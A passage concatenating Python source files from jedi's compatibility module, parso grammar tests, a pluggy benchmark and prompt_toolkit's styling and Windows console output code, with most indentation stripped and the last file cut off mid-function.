tuple containing an open file for the module (if not builtin), the filename
or the name of the module if it is a builtin one and a boolean indicating
if the module is contained in a package.
"""
def _iter_modules(paths, prefix=''):
# Copy of pkgutil.iter_modules adapted to work with namespaces
for path in paths:
importer = pkgutil.get_importer(path)
if not isinstance(importer, importlib.machinery.FileFinder):
# We're only modifying the case for FileFinder. All the other cases
# still need to be checked (like zip-importing). Do this by just
# calling the pkgutil version.
for mod_info in pkgutil.iter_modules([path], prefix):
yield mod_info
continue
        # START COPY OF pkgutil._iter_file_finder_modules.
if importer.path is None or not os.path.isdir(importer.path):
return
yielded = {}
try:
filenames = os.listdir(importer.path)
except OSError:
# ignore unreadable directories like import does
filenames = []
filenames.sort() # handle packages before same-named modules
for fn in filenames:
modname = inspect.getmodulename(fn)
if modname == '__init__' or modname in yielded:
continue
# jedi addition: Avoid traversing special directories
if fn.startswith('.') or fn == '__pycache__':
continue
path = os.path.join(importer.path, fn)
ispkg = False
if not modname and os.path.isdir(path) and '.' not in fn:
modname = fn
# A few jedi modifications: Don't check if there's an
# __init__.py
try:
os.listdir(path)
except OSError:
# ignore unreadable directories like import does
continue
ispkg = True
if modname and '.' not in modname:
yielded[modname] = 1
yield importer, prefix + modname, ispkg
# END COPY
iter_modules = _iter_modules if py_version >= 34 else pkgutil.iter_modules
class ImplicitNSInfo(object):
"""Stores information returned from an implicit namespace spec"""
def __init__(self, name, paths):
self.name = name
self.paths = paths
if is_py3:
all_suffixes = importlib.machinery.all_suffixes
else:
def all_suffixes():
# Is deprecated and raises a warning in Python 3.6.
import imp
return [suffix for suffix, _, _ in imp.get_suffixes()]
# unicode function
try:
unicode = unicode
except NameError:
unicode = str
# re-raise function
if is_py3:
def reraise(exception, traceback):
raise exception.with_traceback(traceback)
else:
eval(compile("""
def reraise(exception, traceback):
raise exception, None, traceback
""", 'blub', 'exec'))
reraise.__doc__ = """
Re-raise `exception` with a `traceback` object.
Usage::
reraise(Exception, sys.exc_info()[2])
"""
class Python3Method(object):
def __init__(self, func):
self.func = func
def __get__(self, obj, objtype):
if obj is None:
return lambda *args, **kwargs: self.func(*args, **kwargs)
else:
return lambda *args, **kwargs: self.func(obj, *args, **kwargs)
def use_metaclass(meta, *bases):
""" Create a class with a metaclass. """
if not bases:
bases = (object,)
return meta("Py2CompatibilityMetaClass", bases, {})
try:
encoding = sys.stdout.encoding
if encoding is None:
encoding = 'utf-8'
except AttributeError:
encoding = 'ascii'
def u(string, errors='strict'):
"""Cast to unicode DAMMIT!
Written because Python2 repr always implicitly casts to a string, so we
    have to cast back to a unicode (and we know that we always deal with valid
unicode, because we check that in the beginning).
"""
if isinstance(string, bytes):
return unicode(string, encoding='UTF-8', errors=errors)
return string
def cast_path(obj):
"""
Take a bytes or str path and cast it to unicode.
Apparently it is perfectly fine to pass both byte and unicode objects into
the sys.path. This probably means that byte paths are normal at other
places as well.
Since this just really complicates everything and Python 2.7 will be EOL
soon anyway, just go with always strings.
"""
return u(obj, errors='replace')
def force_unicode(obj):
# Intentionally don't mix those two up, because those two code paths might
# be different in the future (maybe windows?).
return cast_path(obj)
try:
import builtins # module name in python 3
except ImportError:
import __builtin__ as builtins # noqa: F401
import ast # noqa: F401
def literal_eval(string):
return ast.literal_eval(string)
try:
from itertools import zip_longest
except ImportError:
from itertools import izip_longest as zip_longest # Python 2 # noqa: F401
try:
FileNotFoundError = FileNotFoundError
except NameError:
FileNotFoundError = IOError
try:
NotADirectoryError = NotADirectoryError
except NameError:
NotADirectoryError = IOError
try:
PermissionError = PermissionError
except NameError:
PermissionError = IOError
def no_unicode_pprint(dct):
"""
    Python 2/3 dict __repr__ may be different, because of unicode differences
(with or without a `u` prefix). Normally in doctests we could use `pprint`
to sort dicts and check for equality, but here we have to write a separate
function to do that.
"""
import pprint
s = pprint.pformat(dct)
print(re.sub("u'", "'", s))
def print_to_stderr(*args):
if is_py3:
eval("print(*args, file=sys.stderr)")
else:
print >> sys.stderr, args
sys.stderr.flush()
def utf8_repr(func):
"""
``__repr__`` methods in Python 2 don't allow unicode objects to be
returned. Therefore cast them to utf-8 bytes in this decorator.
"""
def wrapper(self):
result = func(self)
if isinstance(result, unicode):
return result.encode('utf-8')
else:
return result
if is_py3:
return func
else:
return wrapper
if is_py3:
import queue
else:
import Queue as queue # noqa: F401
try:
# Attempt to load the C implementation of pickle on Python 2 as it is way
# faster.
import cPickle as pickle
except ImportError:
import pickle
if sys.version_info[:2] == (3, 3):
"""
Monkeypatch the unpickler in Python 3.3. This is needed, because the
argument `encoding='bytes'` is not supported in 3.3, but badly needed to
communicate with Python 2.
"""
class NewUnpickler(pickle._Unpickler):
dispatch = dict(pickle._Unpickler.dispatch)
def _decode_string(self, value):
# Used to allow strings from Python 2 to be decoded either as
# bytes or Unicode strings. This should be used only with the
# STRING, BINSTRING and SHORT_BINSTRING opcodes.
if self.encoding == "bytes":
return value
else:
return value.decode(self.encoding, self.errors)
def load_string(self):
data = self.readline()[:-1]
# Strip outermost quotes
if len(data) >= 2 and data[0] == data[-1] and data[0] in b'"\'':
data = data[1:-1]
else:
raise pickle.UnpicklingError("the STRING opcode argument must be quoted")
self.append(self._decode_string(pickle.codecs.escape_decode(data)[0]))
dispatch[pickle.STRING[0]] = load_string
def load_binstring(self):
# Deprecated BINSTRING uses signed 32-bit length
len, = pickle.struct.unpack('<i', self.read(4))
if len < 0:
raise pickle.UnpicklingError("BINSTRING pickle has negative byte count")
data = self.read(len)
self.append(self._decode_string(data))
dispatch[pickle.BINSTRING[0]] = load_binstring
def load_short_binstring(self):
len = self.read(1)[0]
data = self.read(len)
self.append(self._decode_string(data))
dispatch[pickle.SHORT_BINSTRING[0]] = load_short_binstring
def load(file, fix_imports=True, encoding="ASCII", errors="strict"):
return NewUnpickler(file, fix_imports=fix_imports,
encoding=encoding, errors=errors).load()
def loads(s, fix_imports=True, encoding="ASCII", errors="strict"):
if isinstance(s, str):
raise TypeError("Can't load pickle from unicode string")
file = pickle.io.BytesIO(s)
return NewUnpickler(file, fix_imports=fix_imports,
encoding=encoding, errors=errors).load()
pickle.Unpickler = NewUnpickler
pickle.load = load
pickle.loads = loads
def pickle_load(file):
try:
if is_py3:
return pickle.load(file, encoding='bytes')
return pickle.load(file)
    # Python on Windows doesn't throw EOF errors for pipes. So reraise them with
# the correct type, which is caught upwards.
except OSError:
if sys.platform == 'win32':
raise EOFError()
raise
def pickle_dump(data, file, protocol):
try:
pickle.dump(data, file, protocol)
# On Python 3.3 flush throws sometimes an error even though the writing
# operation should be completed.
file.flush()
    # Python on Windows doesn't throw EPIPE errors for pipes. So reraise them with
# the correct type and error number.
except OSError:
if sys.platform == 'win32':
raise IOError(errno.EPIPE, "Broken pipe")
raise
# Determine the highest protocol version compatible for a given list of Python
# versions.
def highest_pickle_protocol(python_versions):
protocol = 4
for version in python_versions:
if version[0] == 2:
# The minimum protocol version for the versions of Python that we
# support (2.7 and 3.3+) is 2.
return 2
if version[1] < 4:
protocol = 3
return protocol
try:
from inspect import Parameter
except ImportError:
class Parameter(object):
POSITIONAL_ONLY = object()
POSITIONAL_OR_KEYWORD = object()
VAR_POSITIONAL = object()
KEYWORD_ONLY = object()
VAR_KEYWORD = object()
class GeneralizedPopen(subprocess.Popen):
def __init__(self, *args, **kwargs):
if os.name == 'nt':
try:
# Was introduced in Python 3.7.
CREATE_NO_WINDOW = subprocess.CREATE_NO_WINDOW
except AttributeError:
CREATE_NO_WINDOW = 0x08000000
kwargs['creationflags'] = CREATE_NO_WINDOW
# The child process doesn't need file descriptors except 0, 1, 2.
# This is unix only.
kwargs['close_fds'] = 'posix' in sys.builtin_module_names
super(GeneralizedPopen, self).__init__(*args, **kwargs)
# shutil.which is not available on Python 2.7.
def which(cmd, mode=os.F_OK | os.X_OK, path=None):
"""Given a command, mode, and a PATH string, return the path which
conforms to the given mode on the PATH, or None if there is no such
file.
`mode` defaults to os.F_OK | os.X_OK. `path` defaults to the result
of os.environ.get("PATH"), or can be overridden with a custom search
path.
"""
# Check that a given file can be accessed with the correct mode.
# Additionally check that `file` is not a directory, as on Windows
# directories pass the os.access check.
def _access_check(fn, mode):
return (os.path.exists(fn) and os.access(fn, mode)
and not os.path.isdir(fn))
# If we're given a path with a directory part, look it up directly rather
# than referring to PATH directories. This includes checking relative to the
# current directory, e.g. ./script
if os.path.dirname(cmd):
if _access_check(cmd, mode):
return cmd
return None
if path is None:
path = os.environ.get("PATH", os.defpath)
if not path:
return None
path = path.split(os.pathsep)
if sys.platform == "win32":
# The current directory takes precedence on Windows.
if os.curdir not in path:
path.insert(0, os.curdir)
# PATHEXT is necessary to check on Windows.
pathext = os.environ.get("PATHEXT", "").split(os.pathsep)
# See if the given file matches any of the expected path extensions.
# This will allow us to short circuit when given "python.exe".
# If it does match, only test that one, otherwise we have to try
# others.
if any(cmd.lower().endswith(ext.lower()) for ext in pathext):
files = [cmd]
else:
files = [cmd + ext for ext in pathext]
else:
# On other platforms you don't have things like PATHEXT to tell you
# what file suffixes are executable, so just pass on cmd as-is.
files = [cmd]
seen = set()
for dir in path:
normdir = os.path.normcase(dir)
if normdir not in seen:
seen.add(normdir)
for thefile in files:
name = os.path.join(dir, thefile)
if _access_check(name, mode):
return name
return None
```
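A small, hedged sketch exercising a few of the helpers defined above; `jedi._compatibility` is internal API of the jedi version shown here, so treat the imports as illustrative.
```python
# Illustrative only: relies on the internal module above being importable.
from jedi._compatibility import is_py3, u, unicode, which

print(is_py3)                                   # True on Python 3
print(which("python") or which("python3"))      # PATH lookup, like shutil.which
assert isinstance(u(b"caf\xc3\xa9"), unicode)   # UTF-8 bytes decoded to text
```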
#### File: tests/normalizer_issue_files/allowed_syntax_python3.6.py
```python
foo: int = 4
(foo): int = 3
((foo)): int = 3
foo.bar: int
foo[3]: int
def glob():
global x
y: foo = x
def c():
a = 3
def d():
class X():
nonlocal a
def x():
a = 3
def y():
nonlocal a
def x():
def y():
nonlocal a
a = 3
def x():
a = 3
def y():
class z():
nonlocal a
a = *args, *args
error[(*args, *args)] = 3
*args, *args
```
#### File: py3/tests/test_pgen2.py
```python
from textwrap import dedent
import pytest
from parso import load_grammar
from parso import ParserSyntaxError
from parso.pgen2 import generate_grammar
from parso.python import tokenize
def _parse(code, version=None):
code = dedent(code) + "\n\n"
grammar = load_grammar(version=version)
return grammar.parse(code, error_recovery=False)
def _invalid_syntax(code, version=None, **kwargs):
with pytest.raises(ParserSyntaxError):
module = _parse(code, version=version, **kwargs)
# For debugging
print(module.children)
def test_formfeed(each_version):
s = "foo\n\x0c\nfoo\n"
t = _parse(s, each_version)
assert t.children[0].children[0].type == 'name'
assert t.children[1].children[0].type == 'name'
s = "1\n\x0c\x0c\n2\n"
t = _parse(s, each_version)
with pytest.raises(ParserSyntaxError):
s = "\n\x0c2\n"
_parse(s, each_version)
def test_matrix_multiplication_operator(works_in_py):
works_in_py.parse("a @ b")
works_in_py.parse("a @= b")
def test_yield_from(works_in_py, each_version):
works_in_py.parse("yield from x")
works_in_py.parse("(yield from x) + y")
_invalid_syntax("yield from", each_version)
def test_await_expr(works_in_py):
works_in_py.parse("""async def foo():
await x
""")
works_in_py.parse("""async def foo():
def foo(): pass
def foo(): pass
await x
""")
works_in_py.parse("""async def foo(): return await a""")
works_in_py.parse("""def foo():
def foo(): pass
async def foo(): await x
""")
@pytest.mark.parametrize(
'code', [
"async = 1",
"await = 1",
"def async(): pass",
]
)
def test_async_var(works_not_in_py, code):
works_not_in_py.parse(code)
def test_async_for(works_in_py):
works_in_py.parse("async def foo():\n async for a in b: pass")
@pytest.mark.parametrize("body", [
"""[1 async for a in b
]""",
"""[1 async
for a in b
]""",
"""[
1
async for a in b
]""",
"""[
1
async for a
in b
]""",
"""[
1
async
for
a
in
b
]""",
""" [
1 async for a in b
]""",
])
def test_async_for_comprehension_newline(works_in_py, body):
# Issue #139
works_in_py.parse("""async def foo():
{}""".format(body))
def test_async_with(works_in_py):
works_in_py.parse("async def foo():\n async with a: pass")
def test_async_with_invalid(works_in_py):
works_in_py.parse("""def foo():\n async with a: pass""")
def test_raise_3x_style_1(each_version):
_parse("raise", each_version)
def test_raise_2x_style_2(works_not_in_py):
works_not_in_py.parse("raise E, V")
def test_raise_2x_style_3(works_not_in_py):
works_not_in_py.parse("raise E, V, T")
def test_raise_2x_style_invalid_1(each_version):
_invalid_syntax("raise E, V, T, Z", version=each_version)
def test_raise_3x_style(works_in_py):
works_in_py.parse("raise E1 from E2")
def test_raise_3x_style_invalid_1(each_version):
_invalid_syntax("raise E, V from E1", each_version)
def test_raise_3x_style_invalid_2(each_version):
_invalid_syntax("raise E from E1, E2", each_version)
def test_raise_3x_style_invalid_3(each_version):
_invalid_syntax("raise from E1, E2", each_version)
def test_raise_3x_style_invalid_4(each_version):
_invalid_syntax("raise E from", each_version)
# Adapted from Python 3's Lib/test/test_grammar.py:GrammarTests.testFuncdef
def test_annotation_1(works_in_py):
works_in_py.parse("""def f(x) -> list: pass""")
def test_annotation_2(works_in_py):
works_in_py.parse("""def f(x:int): pass""")
def test_annotation_3(works_in_py):
works_in_py.parse("""def f(*x:str): pass""")
def test_annotation_4(works_in_py):
works_in_py.parse("""def f(**x:float): pass""")
def test_annotation_5(works_in_py):
works_in_py.parse("""def f(x, y:1+2): pass""")
def test_annotation_6(each_version):
_invalid_syntax("""def f(a, (b:1, c:2, d)): pass""", each_version)
def test_annotation_7(each_version):
_invalid_syntax("""def f(a, (b:1, c:2, d), e:3=4, f=5, *g:6): pass""", each_version)
def test_annotation_8(each_version):
s = """def f(a, (b:1, c:2, d), e:3=4, f=5,
*g:6, h:7, i=8, j:9=10, **k:11) -> 12: pass"""
_invalid_syntax(s, each_version)
def test_except_new(each_version):
s = dedent("""
try:
x
except E as N:
y""")
_parse(s, each_version)
def test_except_old(works_not_in_py):
s = dedent("""
try:
x
except E, N:
y""")
works_not_in_py.parse(s)
# Adapted from Python 3's Lib/test/test_grammar.py:GrammarTests.testAtoms
def test_set_literal_1(works_in_py):
works_in_py.parse("""x = {'one'}""")
def test_set_literal_2(works_in_py):
works_in_py.parse("""x = {'one', 1,}""")
def test_set_literal_3(works_in_py):
works_in_py.parse("""x = {'one', 'two', 'three'}""")
def test_set_literal_4(works_in_py):
works_in_py.parse("""x = {2, 3, 4,}""")
def test_new_octal_notation(each_version):
_parse("""0o7777777777777""", each_version)
_invalid_syntax("""0o7324528887""", each_version)
def test_old_octal_notation(works_not_in_py):
works_not_in_py.parse("07")
def test_long_notation(works_not_in_py):
works_not_in_py.parse("0xFl")
works_not_in_py.parse("0xFL")
works_not_in_py.parse("0b1l")
works_not_in_py.parse("0B1L")
works_not_in_py.parse("0o7l")
works_not_in_py.parse("0O7L")
works_not_in_py.parse("0l")
works_not_in_py.parse("0L")
works_not_in_py.parse("10l")
works_not_in_py.parse("10L")
def test_new_binary_notation(each_version):
_parse("""0b101010""", each_version)
_invalid_syntax("""0b0101021""", each_version)
def test_class_new_syntax(works_in_py):
works_in_py.parse("class B(t=7): pass")
works_in_py.parse("class B(t, *args): pass")
works_in_py.parse("class B(t, **kwargs): pass")
works_in_py.parse("class B(t, *args, **kwargs): pass")
works_in_py.parse("class B(t, y=9, *args, **kwargs): pass")
def test_parser_idempotency_extended_unpacking(works_in_py):
"""A cut-down version of pytree_idempotency.py."""
works_in_py.parse("a, *b, c = x\n")
works_in_py.parse("[*a, b] = x\n")
works_in_py.parse("(z, *y, w) = m\n")
works_in_py.parse("for *z, m in d: pass\n")
def test_multiline_bytes_literals(each_version):
s = """
md5test(b"\xaa" * 80,
(b"Test Using Larger Than Block-Size Key "
b"and Larger Than One Block-Size Data"),
"6f630fad67cda0ee1fb1f562db3aa53e")
"""
_parse(s, each_version)
def test_multiline_bytes_tripquote_literals(each_version):
s = '''
b"""
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN">
"""
'''
_parse(s, each_version)
def test_ellipsis(works_in_py, each_version):
works_in_py.parse("...")
_parse("[0][...]", version=each_version)
def test_dict_unpacking(works_in_py):
works_in_py.parse("{**dict(a=3), foo:2}")
def test_multiline_str_literals(each_version):
s = """
md5test("\xaa" * 80,
("Test Using Larger Than Block-Size Key "
"and Larger Than One Block-Size Data"),
"6f630fad67cda0ee1fb1f562db3aa53e")
"""
_parse(s, each_version)
def test_py2_backticks(works_not_in_py):
works_not_in_py.parse("`1`")
def test_py2_string_prefixes(works_not_in_py):
works_not_in_py.parse("ur'1'")
works_not_in_py.parse("Ur'1'")
works_not_in_py.parse("UR'1'")
_invalid_syntax("ru'1'", works_not_in_py.version)
def py_br(each_version):
_parse('br""', each_version)
def test_py3_rb(works_in_py):
works_in_py.parse("rb'1'")
works_in_py.parse("RB'1'")
def test_left_recursion():
with pytest.raises(ValueError, match='left recursion'):
generate_grammar('foo: foo NAME\n', tokenize.PythonTokenTypes)
@pytest.mark.parametrize(
'grammar, error_match', [
['foo: bar | baz\nbar: NAME\nbaz: NAME\n',
r"foo is ambiguous.*given a (PythonTokenTypes\.)?NAME.*bar or baz"],
['''foo: bar | baz\nbar: 'x'\nbaz: "x"\n''',
r"foo is ambiguous.*given a ReservedString\(x\).*bar or baz"],
['''foo: bar | 'x'\nbar: 'x'\n''',
r"foo is ambiguous.*given a ReservedString\(x\).*bar or foo"],
# An ambiguity with the second (not the first) child of a production
['outer: "a" [inner] "b" "c"\ninner: "b" "c" [inner]\n',
r"outer is ambiguous.*given a ReservedString\(b\).*inner or outer"],
# An ambiguity hidden by a level of indirection (middle)
['outer: "a" [middle] "b" "c"\nmiddle: inner\ninner: "b" "c" [inner]\n',
r"outer is ambiguous.*given a ReservedString\(b\).*middle or outer"],
]
)
def test_ambiguities(grammar, error_match):
with pytest.raises(ValueError, match=error_match):
generate_grammar(grammar, tokenize.PythonTokenTypes)
```
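The tests above boil down to the parso calls sketched below (assuming parso is installed); parsing with `error_recovery=False` raises `ParserSyntaxError` for grammar that the selected version rejects.
```python
# Hedged sketch of the API the tests exercise; assumes `parso` is installed.
from parso import load_grammar, ParserSyntaxError

grammar = load_grammar(version="3.6")
module = grammar.parse("raise E1 from E2\n", error_recovery=False)
print([child.type for child in module.children])

try:
    grammar.parse("raise E, V\n", error_recovery=False)  # Python-2-only form
except ParserSyntaxError as exc:
    print("rejected:", exc)
```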
#### File: py3/tests/benchmark.py
```python
import pytest
from pluggy import HookspecMarker, HookimplMarker, PluginManager
from pluggy._hooks import HookImpl
from pluggy._callers import _multicall
hookspec = HookspecMarker("example")
hookimpl = HookimplMarker("example")
@hookimpl
def hook(arg1, arg2, arg3):
return arg1, arg2, arg3
@hookimpl(hookwrapper=True)
def wrapper(arg1, arg2, arg3):
yield
@pytest.fixture(params=[10, 100], ids="hooks={}".format)
def hooks(request):
return [hook for i in range(request.param)]
@pytest.fixture(params=[10, 100], ids="wrappers={}".format)
def wrappers(request):
return [wrapper for i in range(request.param)]
def test_hook_and_wrappers_speed(benchmark, hooks, wrappers):
def setup():
hook_name = "foo"
hook_impls = []
for method in hooks + wrappers:
f = HookImpl(None, "<temp>", method, method.example_impl)
hook_impls.append(f)
caller_kwargs = {"arg1": 1, "arg2": 2, "arg3": 3}
firstresult = False
return (hook_name, hook_impls, caller_kwargs, firstresult), {}
benchmark.pedantic(_multicall, setup=setup)
@pytest.mark.parametrize(
("plugins, wrappers, nesting"),
[
(1, 1, 0),
(1, 1, 1),
(1, 1, 5),
(1, 5, 1),
(1, 5, 5),
(5, 1, 1),
(5, 1, 5),
(5, 5, 1),
(5, 5, 5),
(20, 20, 0),
(100, 100, 0),
],
)
def test_call_hook(benchmark, plugins, wrappers, nesting):
pm = PluginManager("example")
class HookSpec:
@hookspec
def fun(self, hooks, nesting: int):
yield
class Plugin:
def __init__(self, num):
self.num = num
def __repr__(self):
return f"<Plugin {self.num}>"
@hookimpl
def fun(self, hooks, nesting: int):
if nesting:
hooks.fun(hooks=hooks, nesting=nesting - 1)
class PluginWrap:
def __init__(self, num):
self.num = num
def __repr__(self):
return f"<PluginWrap {self.num}>"
@hookimpl(hookwrapper=True)
def fun(self):
yield
pm.add_hookspecs(HookSpec)
for i in range(plugins):
pm.register(Plugin(i), name=f"plug_{i}")
for i in range(wrappers):
pm.register(PluginWrap(i), name=f"wrap_plug_{i}")
benchmark(pm.hook.fun, hooks=pm.hook, nesting=nesting)
```
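For context, a minimal (non-benchmark) pluggy round trip looks like the hedged sketch below; it assumes a recent pluggy release and uses made-up spec and plugin names.
```python
# Illustrative sketch; the project/hook names are invented.
import pluggy

hookspec = pluggy.HookspecMarker("example")
hookimpl = pluggy.HookimplMarker("example")

class Spec:
    @hookspec
    def greet(self, name):
        """Return a greeting for `name`."""

class Plugin:
    @hookimpl
    def greet(self, name):
        return "hello, " + name

pm = pluggy.PluginManager("example")
pm.add_hookspecs(Spec)
pm.register(Plugin())
print(pm.hook.greet(name="pluggy"))  # -> ['hello, pluggy']
```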
#### File: prompt_toolkit/styles/from_dict.py
```python
try:
from collections.abc import Mapping
except ImportError:
from collections import Mapping
from .base import Style, DEFAULT_ATTRS, ANSI_COLOR_NAMES
from .defaults import DEFAULT_STYLE_EXTENSIONS
from .utils import merge_attrs, split_token_in_parts
from six.moves import range
__all__ = (
'style_from_dict',
)
def _colorformat(text):
"""
Parse/validate color format.
Like in Pygments, but also support the ANSI color names.
(These will map to the colors of the 16 color palette.)
"""
if text[0:1] == '#':
col = text[1:]
if col in ANSI_COLOR_NAMES:
return col
elif len(col) == 6:
return col
elif len(col) == 3:
return col[0]*2 + col[1]*2 + col[2]*2
elif text == '':
return text
raise ValueError('Wrong color format %r' % text)
def style_from_dict(style_dict, include_defaults=True):
"""
Create a ``Style`` instance from a dictionary or other mapping.
The dictionary is equivalent to the ``Style.styles`` dictionary from
pygments, with a few additions: it supports 'reverse' and 'blink'.
Usage::
style_from_dict({
Token: '#ff0000 bold underline',
Token.Title: 'blink',
Token.SomethingElse: 'reverse',
})
:param include_defaults: Include the defaults (built-in) styling for
        selected text, etc...
"""
assert isinstance(style_dict, Mapping)
if include_defaults:
s2 = {}
s2.update(DEFAULT_STYLE_EXTENSIONS)
s2.update(style_dict)
style_dict = s2
# Expand token inheritance and turn style description into Attrs.
token_to_attrs = {}
# (Loop through the tokens in order. Sorting makes sure that
# we process the parent first.)
for ttype, styledef in sorted(style_dict.items()):
# Start from parent Attrs or default Attrs.
attrs = DEFAULT_ATTRS
if 'noinherit' not in styledef:
for i in range(1, len(ttype) + 1):
try:
attrs = token_to_attrs[ttype[:-i]]
except KeyError:
pass
else:
break
# Now update with the given attributes.
for part in styledef.split():
if part == 'noinherit':
pass
elif part == 'bold':
attrs = attrs._replace(bold=True)
elif part == 'nobold':
attrs = attrs._replace(bold=False)
elif part == 'italic':
attrs = attrs._replace(italic=True)
elif part == 'noitalic':
attrs = attrs._replace(italic=False)
elif part == 'underline':
attrs = attrs._replace(underline=True)
elif part == 'nounderline':
attrs = attrs._replace(underline=False)
# prompt_toolkit extensions. Not in Pygments.
elif part == 'blink':
attrs = attrs._replace(blink=True)
elif part == 'noblink':
attrs = attrs._replace(blink=False)
elif part == 'reverse':
attrs = attrs._replace(reverse=True)
elif part == 'noreverse':
attrs = attrs._replace(reverse=False)
# Pygments properties that we ignore.
elif part in ('roman', 'sans', 'mono'):
pass
elif part.startswith('border:'):
pass
# Colors.
elif part.startswith('bg:'):
attrs = attrs._replace(bgcolor=_colorformat(part[3:]))
else:
attrs = attrs._replace(color=_colorformat(part))
token_to_attrs[ttype] = attrs
return _StyleFromDict(token_to_attrs)
class _StyleFromDict(Style):
"""
Turn a dictionary that maps `Token` to `Attrs` into a style class.
:param token_to_attrs: Dictionary that maps `Token` to `Attrs`.
"""
def __init__(self, token_to_attrs):
self.token_to_attrs = token_to_attrs
def get_attrs_for_token(self, token):
# Split Token.
list_of_attrs = []
for token in split_token_in_parts(token):
list_of_attrs.append(self.token_to_attrs.get(token, DEFAULT_ATTRS))
return merge_attrs(list_of_attrs)
def invalidation_hash(self):
return id(self.token_to_attrs)
```
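A hedged usage sketch for `style_from_dict`, assuming prompt_toolkit 1.x where `Token` and this function are public; the token names and colors are illustrative.
```python
# Sketch only; assumes prompt_toolkit 1.x.
from prompt_toolkit.token import Token
from prompt_toolkit.styles import style_from_dict

style = style_from_dict({
    Token.Prompt: '#00aa00 bold',
    Token.Error: 'bg:#ff0000 #ffffff blink',
})
attrs = style.get_attrs_for_token(Token.Prompt)
print(attrs.color, attrs.bold)  # '00aa00' True
```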
#### File: prompt_toolkit/terminal/win32_output.py
```python
from __future__ import unicode_literals
from ctypes import windll, byref, ArgumentError, c_char, c_long, c_ulong, c_uint, pointer
from ctypes.wintypes import DWORD, HANDLE
from prompt_toolkit.renderer import Output
from prompt_toolkit.styles import ANSI_COLOR_NAMES
from prompt_toolkit.win32_types import CONSOLE_SCREEN_BUFFER_INFO, STD_OUTPUT_HANDLE, STD_INPUT_HANDLE, COORD, SMALL_RECT
import os
import six
__all__ = (
'Win32Output',
)
def _coord_byval(coord):
"""
Turns a COORD object into a c_long.
This will cause it to be passed by value instead of by reference. (That is what I think at least.)
    When running ``ptipython`` (only with IPython), we often got the following error::
Error in 'SetConsoleCursorPosition'.
ArgumentError("argument 2: <class 'TypeError'>: wrong type",)
argument 2: <class 'TypeError'>: wrong type
It was solved by turning ``COORD`` parameters into a ``c_long`` like this.
More info: http://msdn.microsoft.com/en-us/library/windows/desktop/ms686025(v=vs.85).aspx
"""
return c_long(coord.Y * 0x10000 | coord.X & 0xFFFF)
#: If True: write the output of the renderer also to the following file. This
#: is very useful for debugging. (e.g.: to see that we don't write more bytes
#: than required.)
_DEBUG_RENDER_OUTPUT = False
_DEBUG_RENDER_OUTPUT_FILENAME = r'prompt-toolkit-windows-output.log'
class NoConsoleScreenBufferError(Exception):
"""
Raised when the application is not running inside a Windows Console, but
the user tries to instantiate Win32Output.
"""
def __init__(self):
# Are we running in 'xterm' on Windows, like git-bash for instance?
xterm = 'xterm' in os.environ.get('TERM', '')
if xterm:
message = ('Found %s, while expecting a Windows console. '
'Maybe try to run this program using "winpty" '
'or run it in cmd.exe instead. Or otherwise, '
'in case of Cygwin, use the Python executable '
'that is compiled for Cygwin.' % os.environ['TERM'])
else:
message = 'No Windows console found. Are you running cmd.exe?'
super(NoConsoleScreenBufferError, self).__init__(message)
class Win32Output(Output):
"""
I/O abstraction for rendering to Windows consoles.
(cmd.exe and similar.)
"""
def __init__(self, stdout, use_complete_width=False):
self.use_complete_width = use_complete_width
self._buffer = []
self.stdout = stdout
self.hconsole = HANDLE(windll.kernel32.GetStdHandle(STD_OUTPUT_HANDLE))
self._in_alternate_screen = False
self.color_lookup_table = ColorLookupTable()
# Remember the default console colors.
info = self.get_win32_screen_buffer_info()
self.default_attrs = info.wAttributes if info else 15
if _DEBUG_RENDER_OUTPUT:
self.LOG = open(_DEBUG_RENDER_OUTPUT_FILENAME, 'ab')
def fileno(self):
" Return file descriptor. "
return self.stdout.fileno()
def encoding(self):
" Return encoding used for stdout. "
return self.stdout.encoding
def write(self, data):
self._buffer.append(data)
def write_raw(self, data):
" For win32, there is no difference between write and write_raw. "
self.write(data)
def get_size(self):
from prompt_toolkit.layout.screen import Size
info = self.get_win32_screen_buffer_info()
# We take the width of the *visible* region as the size. Not the width
# of the complete screen buffer. (Unless use_complete_width has been
# set.)
if self.use_complete_width:
width = info.dwSize.X
else:
width = info.srWindow.Right - info.srWindow.Left
height = info.srWindow.Bottom - info.srWindow.Top + 1
# We avoid the right margin, windows will wrap otherwise.
maxwidth = info.dwSize.X - 1
width = min(maxwidth, width)
# Create `Size` object.
return Size(rows=height, columns=width)
def _winapi(self, func, *a, **kw):
"""
Flush and call win API function.
"""
self.flush()
if _DEBUG_RENDER_OUTPUT:
self.LOG.write(('%r' % func.__name__).encode('utf-8') + b'\n')
self.LOG.write(b' ' + ', '.join(['%r' % i for i in a]).encode('utf-8') + b'\n')
self.LOG.write(b' ' + ', '.join(['%r' % type(i) for i in a]).encode('utf-8') + b'\n')
self.LOG.flush()
try:
return func(*a, **kw)
except ArgumentError as e:
if _DEBUG_RENDER_OUTPUT:
self.LOG.write((' Error in %r %r %s\n' % (func.__name__, e, e)).encode('utf-8'))
def get_win32_screen_buffer_info(self):
"""
Return Screen buffer info.
"""
# NOTE: We don't call the `GetConsoleScreenBufferInfo` API through
# `self._winapi`. Doing so causes Python to crash on certain 64bit
# Python versions. (Reproduced with 64bit Python 2.7.6, on Windows
# 10). It is not clear why. Possibly, it has to do with passing
# these objects as an argument, or through *args.
# The Python documentation contains the following - possibly related - warning:
# ctypes does not support passing unions or structures with
# bit-fields to functions by value. While this may work on 32-bit
# x86, it's not guaranteed by the library to work in the general
# case. Unions and structures with bit-fields should always be
# passed to functions by pointer.
# Also see:
# - https://github.com/ipython/ipython/issues/10070
# - https://github.com/jonathanslenders/python-prompt-toolkit/issues/406
# - https://github.com/jonathanslenders/python-prompt-toolkit/issues/86
self.flush()
sbinfo = CONSOLE_SCREEN_BUFFER_INFO()
success = windll.kernel32.GetConsoleScreenBufferInfo(self.hconsole, byref(sbinfo))
# success = self._winapi(windll.kernel32.GetConsoleScreenBufferInfo,
# self.hconsole, byref(sbinfo))
if success:
return sbinfo
else:
raise NoConsoleScreenBufferError
def set_title(self, title):
"""
Set terminal title.
"""
assert isinstance(title, six.text_type)
self._winapi(windll.kernel32.SetConsoleTitleW, title)
def clear_title(self):
self._winapi(windll.kernel32.SetConsoleTitleW, '')
def erase_screen(self):
start = COORD(0, 0)
sbinfo = self.get_win32_screen_buffer_info()
length = sbinfo.dwSize.X * sbinfo.dwSize.Y
self.cursor_goto(row=0, column=0)
self._erase(start, length)
def erase_down(self):
